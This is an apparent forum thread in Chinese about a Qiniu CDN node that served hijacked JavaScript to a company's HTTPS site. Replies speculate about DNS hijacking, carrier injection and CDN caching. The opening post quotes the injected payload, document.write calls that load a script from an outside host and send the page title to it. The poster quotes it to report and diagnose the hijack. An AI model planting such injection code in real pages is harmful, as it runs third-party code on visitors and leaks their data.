七牛某个节点被劫持了

Recommended Services

› ClearDB

This topic created in 3944 days ago, the information mentioned may be changed or developed.

昨天发现公司网站偶尔会无法访问，发现个别时候某个访问https://dn-shimo-assets.qbox.me/assets/scripts/home-a2e8c81c8f.js当解析到218.75.154.115这个ip地址的时候返回的结果不是正常的压缩过的js内容，而是

document.write("<script language='javascript' src='http://dn-shimo-assets.qbox.me/assets/scripts/home-a2e8c81c8f.js?_vv=20080808'></script>");document.write("<script language='javascript' src='http://p.ywbmh.com:7777/pt/pt.php?src=p0005&t="+encodeURIComponent(document.title)+"&ci=2875964025'></script>");

目测这货是试图用 _vv 参数来让浏览器访问其他节点读取这个js好让用户可以正常访问，但是不巧公司网站是https的，https里加载http的js资源是会页面报错的，然后就被我发现了。
v友有谁遇到过这玩意吗？在七牛上提交了工单，但是一天了，木人鸟我，电话也打了，说是会回复工单，然而并没有。

Alt text

工单

Text

20 replies • 2015-08-26 16:25:18 +08:00

virusdefender

Aug 13, 2015

https 的也会劫持么？

ccbikai

PRO

Aug 13, 2015

@virusdefender DNS 劫持

bilok

Aug 13, 2015

dns劫持证书会报错吧
乱签证书会被全球吊销根证书吧
应该是某台服务器上缓存出问题被劫持了

Agromania

Aug 13, 2015

据说是运营商干的？

http://bbs.itzmx.com/forum.php?mod=viewthread&tid=9410&fromuid=1

gamexg

Aug 13, 2015 via Android

同样的疑问https没报证书错误？
七牛的证书私钥泄露了？

gamexg

Aug 13, 2015 via Android

@niuer

gamexg

Aug 13, 2015

这个应该是正确的 http 响应：

Accept-Ranges:bytes
Access-Control-Allow-Origin:*
Access-Control-Max-Age:2592000
Cache-Control:public, max-age=31536000
Connection:keep-alive
Content-Disposition:inline; filename="home-a2e8c81c8f.js"
Content-Encoding:gzip
Content-Transfer-Encoding:binary
Content-Type:application/javascript
Date:Thu, 13 Aug 2015 05:25:49 GMT
ETag:"Fr4cMb1JgqsOHYneDzsn7Kkt3dFi.gz"
Last-Modified:Tue, 11 Aug 2015 07:11:13 GMT
Server:nginx/1.4.4
Transfer-Encoding:chunked
X-Log:mc.g;IO:2
X-Qiniu-Zone:0
X-Reqid:QQgAAMyZzA093fkT
X-Via:1.1 nn121:8080 (Cdn Cache Server V2.0), 1.1 jiax13:2 (Cdn Cache Server V2.0)

和楼主的截图出错时的http头不相同，印象中七牛为了防止出现跨域问题都带 Access-Control-Allow-Origin:* 头的。

dianso

Aug 13, 2015

等吧，总有轮到你工单的时候。

lsylsy2

Aug 13, 2015

HTTPS的话，七牛到你的电脑应该是不会被修改的……
我们可以得出结论七牛在边缘节点到源节点的路径是明文传输的？

zhuang

Aug 13, 2015

我猜当前 cdn 服务器的缓存失效了，通过增加 _vv 参数指向不存在的内容实现重定向回源。

我不清楚七牛是如何做 ssl cdn 的，应该没有证书托管或者直接使用七牛的证书吧？具体实现就是全站 https，但是来源有你自己的服务器，也有来自七牛的服务器，各自使用各自的证书。

这种使用模式是有安全隐患的，具体可以参考我在另一个帖子 #12 的回复。

https://v2ex.com/t/201769#reply12